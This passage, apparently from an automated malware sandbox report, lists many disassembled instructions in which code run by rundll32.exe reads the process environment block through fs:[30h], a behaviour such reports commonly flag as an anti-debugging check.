                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF216A0 mov eax, dword ptr fs:[00000030h]3_2_7EF216A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF27630 mov edx, dword ptr fs:[00000030h]3_2_7EF27630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF27630 mov eax, dword ptr fs:[00000030h]3_2_7EF27630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF27630 mov ecx, dword ptr fs:[00000030h]3_2_7EF27630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3B7C0 mov edx, dword ptr fs:[00000030h]3_2_7EF3B7C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3B7B0 mov eax, dword ptr fs:[00000030h]3_2_7EF3B7B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF39770 mov eax, dword ptr fs:[00000030h]3_2_7EF39770
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1D700 mov eax, dword ptr fs:[00000030h]3_2_7EF1D700
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF19480 mov edx, dword ptr fs:[00000030h]3_2_7EF19480
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF17450 mov edx, dword ptr fs:[00000030h]3_2_7EF17450
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF5D438 mov ecx, dword ptr fs:[00000030h]3_2_7EF5D438
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1D3B0 mov edx, dword ptr fs:[00000030h]3_2_7EF1D3B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF37090 mov eax, dword ptr fs:[00000030h]3_2_7EF37090
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1709A mov eax, dword ptr fs:[00000030h]3_2_7EF1709A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF29020 mov ecx, dword ptr fs:[00000030h]3_2_7EF29020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF29020 mov eax, dword ptr fs:[00000030h]3_2_7EF29020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF17000 mov eax, dword ptr fs:[00000030h]3_2_7EF17000
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF16DF0 mov edx, dword ptr fs:[00000030h]3_2_7EF16DF0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF46D80 mov edx, dword ptr fs:[00000030h]3_2_7EF46D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF46D80 mov ecx, dword ptr fs:[00000030h]3_2_7EF46D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF18B90 mov edx, dword ptr fs:[00000030h]3_2_7EF18B90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF18B90 mov ecx, dword ptr fs:[00000030h]3_2_7EF18B90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1CB70 mov edx, dword ptr fs:[00000030h]3_2_7EF1CB70
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1CB70 mov eax, dword ptr fs:[00000030h]3_2_7EF1CB70
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF288C4 mov ecx, dword ptr fs:[00000030h]3_2_7EF288C4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF288C4 mov edx, dword ptr fs:[00000030h]3_2_7EF288C4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF38860 mov ecx, dword ptr fs:[00000030h]3_2_7EF38860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF38860 mov eax, dword ptr fs:[00000030h]3_2_7EF38860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF38860 mov edx, dword ptr fs:[00000030h]3_2_7EF38860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1C820 mov edx, dword ptr fs:[00000030h]3_2_7EF1C820
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3A9E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF3A9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3A9E0 mov eax, dword ptr fs:[00000030h]3_2_7EF3A9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3A9E0 mov edx, dword ptr fs:[00000030h]3_2_7EF3A9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2A980 mov edx, dword ptr fs:[00000030h]3_2_7EF2A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2A980 mov ecx, dword ptr fs:[00000030h]3_2_7EF2A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2A980 mov eax, dword ptr fs:[00000030h]3_2_7EF2A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14954 mov ecx, dword ptr fs:[00000030h]3_2_7EF14954
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14954 mov ecx, dword ptr fs:[00000030h]3_2_7EF14954
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14954 mov edx, dword ptr fs:[00000030h]3_2_7EF14954
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF346E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF346E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov edx, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov ecx, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov edx, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF6467B mov eax, dword ptr fs:[00000030h]3_2_7EF6467B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF6464A mov eax, dword ptr fs:[00000030h]3_2_7EF6464A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF64606 mov eax, dword ptr fs:[00000030h]3_2_7EF64606
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1C4D0 mov edx, dword ptr fs:[00000030h]3_2_7EF1C4D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14464 mov edx, dword ptr fs:[00000030h]3_2_7EF14464
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14464 mov ecx, dword ptr fs:[00000030h]3_2_7EF14464
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF24430 mov ecx, dword ptr fs:[00000030h]3_2_7EF24430
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14400 mov edx, dword ptr fs:[00000030h]3_2_7EF14400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14400 mov ecx, dword ptr fs:[00000030h]3_2_7EF14400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14400 mov ecx, dword ptr fs:[00000030h]3_2_7EF14400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14400 mov ecx, dword ptr fs:[00000030h]3_2_7EF14400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14400 mov ecx, dword ptr fs:[00000030h]3_2_7EF14400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14400 mov edx, dword ptr fs:[00000030h]3_2_7EF14400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov ecx, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov ecx, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov eax, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov eax, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov eax, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov eax, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov eax, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov ecx, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov edx, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov ecx, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov eax, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov ecx, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF38560 mov eax, dword ptr fs:[00000030h]3_2_7EF38560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov edx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov eax, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov eax, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov eax, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov eax, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov eax, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov eax, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4C270 mov eax, dword ptr fs:[00000030h]3_2_7EF4C270
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3E200 mov ecx, dword ptr fs:[00000030h]3_2_7EF3E200
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF383B0 mov edx, dword ptr fs:[00000030h]3_2_7EF383B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6CC69C40 mov eax, dword ptr fs:[00000030h]5_2_6CC69C40
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA5F00 mov ecx, dword ptr fs:[00000030h]5_2_7FAA5F00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAABC90 mov ecx, dword ptr fs:[00000030h]5_2_7FAABC90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov eax, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov eax, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAB7C0 mov edx, dword ptr fs:[00000030h]5_2_7FAAB7C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8963F mov edx, dword ptr fs:[00000030h]5_2_7FA8963F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FABAFE0 mov edx, dword ptr fs:[00000030h]5_2_7FABAFE0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FABAFE0 mov eax, dword ptr fs:[00000030h]5_2_7FABAFE0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA92A30 mov edx, dword ptr fs:[00000030h]5_2_7FA92A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA92A30 mov ecx, dword ptr fs:[00000030h]5_2_7FA92A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA92A30 mov eax, dword ptr fs:[00000030h]5_2_7FA92A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA92A30 mov edx, dword ptr fs:[00000030h]5_2_7FA92A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA8860 mov ecx, dword ptr fs:[00000030h]5_2_7FAA8860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA8860 mov eax, dword ptr fs:[00000030h]5_2_7FAA8860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA8860 mov edx, dword ptr fs:[00000030h]5_2_7FAA8860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA8860 mov eax, dword ptr fs:[00000030h]5_2_7FAA8860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA8860 mov ecx, dword ptr fs:[00000030h]5_2_7FAA8860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA83B0 mov edx, dword ptr fs:[00000030h]5_2_7FAA83B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAE200 mov ecx, dword ptr fs:[00000030h]5_2_7FAAE200
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA91CA0 mov eax, dword ptr fs:[00000030h]5_2_7FA91CA0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA7B60 mov ecx, dword ptr fs:[00000030h]5_2_7FAA7B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA7B60 mov eax, dword ptr fs:[00000030h]5_2_7FAA7B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA7B60 mov ecx, dword ptr fs:[00000030h]5_2_7FAA7B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAB9A0 mov eax, dword ptr fs:[00000030h]5_2_7FAAB9A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov eax, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov edx, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov ecx, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov eax, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov ecx, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov edx, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov edx, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov edx, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAB7B0 mov eax, dword ptr fs:[00000030h]5_2_7FAAB7B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8D700 mov eax, dword ptr fs:[00000030h]5_2_7FA8D700
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA9770 mov eax, dword ptr fs:[00000030h]5_2_7FAA9770
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA916A0 mov edx, dword ptr fs:[00000030h]5_2_7FA916A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA916A0 mov eax, dword ptr fs:[00000030h]5_2_7FA916A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov edx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov edx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov edx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov eax, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov edx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov ecx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov ecx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov ecx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov edx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FACD438 mov ecx, dword ptr fs:[00000030h]5_2_7FACD438
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA87450 mov edx, dword ptr fs:[00000030h]5_2_7FA87450
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8D3B0 mov edx, dword ptr fs:[00000030h]5_2_7FA8D3B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8709A mov eax, dword ptr fs:[00000030h]5_2_7FA8709A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA7090 mov eax, dword ptr fs:[00000030h]5_2_7FAA7090
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov ecx, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov ecx, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA87000 mov eax, dword ptr fs:[00000030h]5_2_7FA87000
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB6D80 mov edx, dword ptr fs:[00000030h]5_2_7FAB6D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB6D80 mov ecx, dword ptr fs:[00000030h]5_2_7FAB6D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB6D80 mov ecx, dword ptr fs:[00000030h]5_2_7FAB6D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB6D80 mov ecx, dword ptr fs:[00000030h]5_2_7FAB6D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB6D80 mov edx, dword ptr fs:[00000030h]5_2_7FAB6D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA86DF0 mov edx, dword ptr fs:[00000030h]5_2_7FA86DF0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA88B90 mov edx, dword ptr fs:[00000030h]5_2_7FA88B90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA88B90 mov ecx, dword ptr fs:[00000030h]5_2_7FA88B90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA88B90 mov ecx, dword ptr fs:[00000030h]5_2_7FA88B90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8CB70 mov edx, dword ptr fs:[00000030h]5_2_7FA8CB70
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8CB70 mov eax, dword ptr fs:[00000030h]5_2_7FA8CB70
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov edx, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov ecx, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov eax, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov eax, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov eax, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov eax, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov eax, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov edx, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov eax, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAA9E0 mov ecx, dword ptr fs:[00000030h]5_2_7FAAA9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAA9E0 mov eax, dword ptr fs:[00000030h]5_2_7FAAA9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAA9E0 mov ecx, dword ptr fs:[00000030h]5_2_7FAAA9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAA9E0 mov edx, dword ptr fs:[00000030h]5_2_7FAAA9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAA9E0 mov eax, dword ptr fs:[00000030h]5_2_7FAAA9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84954 mov ecx, dword ptr fs:[00000030h]5_2_7FA84954
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84954 mov ecx, dword ptr fs:[00000030h]5_2_7FA84954
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84954 mov edx, dword ptr fs:[00000030h]5_2_7FA84954
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA988C4 mov ecx, dword ptr fs:[00000030h]5_2_7FA988C4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA988C4 mov edx, dword ptr fs:[00000030h]5_2_7FA988C4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8C820 mov edx, dword ptr fs:[00000030h]5_2_7FA8C820
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA46E0 mov ecx, dword ptr fs:[00000030h]5_2_7FAA46E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov edx, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
